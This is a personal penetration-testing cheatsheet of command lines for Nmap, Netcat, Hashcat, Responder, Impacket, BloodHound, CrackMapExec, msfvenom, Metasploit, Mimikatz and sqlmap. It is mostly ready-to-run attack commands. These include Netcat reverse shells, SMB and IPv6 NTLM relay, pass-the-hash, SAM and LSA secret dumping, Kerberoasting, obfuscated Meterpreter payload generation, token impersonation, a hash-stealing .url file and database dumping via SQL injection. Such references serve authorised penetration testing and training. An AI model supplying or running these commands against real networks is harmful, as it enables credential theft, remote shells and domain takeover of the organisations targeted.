# Cheatsheet by Invictus808

## locate

```sh
locate .pot
```

- find paths to file

```sh
sudo updatedb
```

- update file paths for locate


## Nessus

```sh
/bin/systemctl start nessusd.service
```

- https://inhibitor:8834/


## Nmap

```sh
# scans
nmap -T4 -p- $IP # collect all open ports
nmap -T4 -p<specified_ports> -A $IP # -A flag gets detailed info

# SMB2 scan
nmap --script=smb2-security-mode.nse -p445 -Pn 10.8.8.0/24 --open

# SSL ciphers strength
nmap --script=ssl-enum-ciphers -p443 $DOMAIN
```


## Netcat

```sh
# establisher
nc $IP $PORT
nc $IP $PORT -e /bin/bash

# linux
# p = give pipe default FIFO passthrough structure
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc $IP $PORT 1>/tmp/backpipe


# listener
nc -lnvp $PORT
nc -lnvp $PORT -s $INTERFACE
```

- -e = program to exec after connect
- -l = listen mode
- -n = no DNS, IP addresses only
- -v = verbose
- -p = port
- -s = interface
- passback
    - listen for credentials
    - LDAP - 389
        - ```sh
            nc -lnvp 389
            ```


## Hashcat

```sh
hashcat -a $ATTACK_MODE_NUMBER -m $MODULE_NUMBER ntlmhashes.txt $WORD_LIST -o crackedhashes.txt -O --force --potfile-disable
```

- common wordlists
    - `/usr/share/wordlists/rockyou.txt`
- -a = attack mode
    - Attack Modes
        | # | Mode |
        | :---: | :--- |
        | 0 | Straight |
        | 1 | Combination |
        | 3 | Brute-force |
        | 6 | Hybrid Wordlist + Mask |
        | 7 | Hybrid Mask + Wordlist |
        | 9 | Association |
- -m = module
    - Search for module #
        - ```sh
            hashcat --help | grep $MODULE_NAME
            ```
- -\-force = use CPU to crack hash
    - if force does not work, install hashcat on base OS of your machine
- -o = output file
- -O = enables optimized kernels (limits password length)
- --potfile-disable = disable pot file cache


## SMB

```sh
# list
smbclient -N -L \\\\$IP\\

# connect
smbclient \\\\$IP\\
```

- -L = list shares
- -N = no password prompt
- connected
    - useful commands
        - ```ps1
            prompt off # turn off prompt
            recurse on # download all files specified
            mget * # download files (* - wildcard)
            ```


## Responder

```sh
# relay
sudo responder -I eth0 -dwv

# passback
sudo responder -I eth0 -A
```

- -v = verbose - shows previously found hashes
    - previously found hashes stored in a .pot file
- -r = deprecated
- -A = analyze mode
- relay
    - modify `/etc/responder/Responder.conf`
        - note: `/usr/share/responder/Responder.conf` is a sym link
        ```
        SMB = Off
        HTTP = Off
        ```
- passback
    - listen only mode
    - credentials received in clear text


## [MITM6](https://github.com/dirkjanm/mitm6) by [Dirk-jan](https://github.com/dirkjanm)

```sh
sudo mitm6 -d $DOMAIN
```
- -d = domain


## [Impacket](https://github.com/fortra/impacket) by [Forta](https://github.com/fortra) (Origin: [SecureAuth](https://secureauth.com/labs/open-source-tools/impacket/))

### [GetUserSPNs.py](https://github.com/fortra/impacket/blob/master/examples/GetUserSPNs.py)

```sh
GetUserSPNs.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DOMAIN_CONTROLLER_IP -request
```

- Kerberoasting
    - Retrieve hashes of services
    - Crack with Hashcat


### [ntlmrelayx.py](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)

```sh
# SMB relay attack - responder -> ntlmrelayx
sudo ntlmrelayx.py -tf targets.txt -smb2support
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
sudo ntlmrelayx.py -tf targets.txt -smb2support -e test.exe
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# DNS takeover via IPv6 - mitm6 -> ntlmrelayx
sudo ntlmrelayx.py -6 -t ldaps://$DOMAIN_CONTROLLER_IP -wh fakewpad.$DOMAIN -l lootme
```
- SMB relay attack
    - targets.txt is a list of machines you want to relay credentials TO when the victim machine connects to the attacking machine
    - -i = interactive shell (`127.0.0.1:PORT`)
        - ```sh
            nc 127.0.0.1 $PORT
            ```
    - -e = file to execute on machine
    - -c = command to execute on machine
- DNS takeover via IPv6
    - -6 = IPv6
    - -t = target machine
    - -wh = WPAD host (fake)
    - -l = loot directory (gathered loot will be stored here)


### [psexec.py](https://github.com/fortra/impacket/blob/master/examples/psexec.py)

```sh
# password
psexec.py $DOMAIN/$USERNAME:$PASSWORD@$IP

# hash
psexec.py $USERNAME:@$IP -hashes $LMHASH:$NTHASH
```

- -hashes = specify the hash


### [smbexec.py](https://github.com/fortra/impacket/blob/master/examples/smbexec.py)

```sh
# password
smbexec.py $DOMAIN/$USERNAME:$PASSWORD@$IP
```


### [smbserver.py](https://github.com/fortra/impacket/blob/master/examples/smbserver.py)

```sh
# smb share
smbserver.py $SHARE_NAME /path/to/directory -smb2support
```

- SMB share at `\\\\$IP\\$SHARE_NAME`


### [wmiexec.py](https://github.com/fortra/impacket/blob/master/examples/wmiexec.py)

```sh
# password
wmiexec.py $DOMAIN/$USERNAME:$PASSWORD@$IP
```


## [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) - [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) by [PowerShellMafia](https://github.com/PowerShellMafia)

```ps1
powershell -ep bypass

. .\PowerView.ps1
```

- [Cheatsheet](PowerViewCheatsheet.txt)


## [SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)

```ps1
powershell -ep bypass

. .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -Domain $DOMAIN -ZipFileName domainData.zip
```

- -CollectionMethod = specify method of collection
- -Domain = specify domain
- -ZipFileName = specify output zip file


## [BloodHound](https://github.com/BloodHoundAD/BloodHound)

```sh
# Set up neo4j first
neo4j console

# Run BloodHound GUI
bloodhound
```

- Upload data collected using `SharpHound.ps1`
- Database Info > General Information
- Queries
    - Custom Queries
    - Pre-Built Queries
        - Find all Domain Admins
        - Find Shortest Paths to Domain Admins
        - Shortest Path to Unconstrained Delegation Systems
        - Shortest Paths from Kerberoastable Users
        - Shortest Paths to High Value Targets


## Crackmapexec

```sh
# pass the password
crackmapexec smb $IP_CIDR -u $USERNAME -d $DOMAIN -p $PASSWORD
crackmapexec smb $IP_CIDR -u $USERNAME -d $DOMAIN -p $PASSWORD --sam

# pass the hash
crackmapexec smb $IP_CIDR -u $USERNAME -H $HASH --local-auth
```

- -u = specify username
- -d = specify domain
- -p = specify password
- --sam = dump SAM file


## [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) - [Impacket](https://github.com/fortra/impacket) by [Forta](https://github.com/fortra) (Origin: [SecureAuth](https://secureauth.com/labs/open-source-tools/impacket/))

```sh
secretsdump.py $DOMAIN/$USERNAME:$PASSWORD@$IP
```


## [MSFvenom](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)

```sh
msfvenom -p $PAYLOAD LHOST=$IP LPORT=$PORT -f $FILE_TYPE -i $OBFUSCATION_ROUNDS -o $FILE_NAME

# examples
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o payload.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f dll -i 8 -o payload.dll
```

- -p = specify payload to use
- -f = specify file type
- -i = specify number of obfuscation rounds
- -o = specify output file name
- obfuscation
    - LPORT should be a common port (i.e. 443)
    - increase number of rounds to obfuscate


## [Metasploit](https://www.metasploit.com)

```sh
msfconsole
```


### msfconsole commands

```sh
exploit
help
options
run
search
set
use
```


#### Listener

```sh
use multi/handler
set payload $PAYLOAD
set lhost $IP
set lport $PORT
run
```

- note: more options might need to be set


#### Token Impersonation

```sh
# meterpreter shell commands
hashdump
load incognito

list_tokens -u
# OR
list_tokens -g

impersonate_token $TOKEN
shell
```

```ps1
# windows 10 machine command prompt
Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit' -Computer $DOMAIN_CONTROLLER_NAME.$DOMAIN
```


## GPP-Decrypt

```sh
gpp-decrypt $CREDENTIAL
```

- Group Policy Preference (GPP)
    - MS14-025
- tool to decrypt GPP credential


## URL File Attack

- new file
    - save to file share
    - name: @something OR "@test.url" OR ~test.url"
        - @/~ puts file at the top of the share - ensures load to send hash
    - Save as type: All Files
    - content
        - ```
            [Internet Shortcut]
            URL=blah
            WorkingDirectory=blah
            IconFile=\\$IP\%USERNAME%.icon
            IconIndex=1
            ```
- use Responder to capture hashes
    - use NTLM Relay X to relay hashes


## sqlmap

```sh
sqlmap -r $REQUEST_FILE -p $PARAMETER --batch
sqlmap -r $REQUEST_FILE -p $PARAMETER --dbs
sqlmap -r $REQUEST_FILE -p $PARAMETER -D $DATABASE --tables
sqlmap -r $REQUEST_FILE -p $PARAMETER -D $DATABASE -T $TABLE --dump

# example
sqlmap -r sample.req -p username -D invictus_db -T users --dump
```
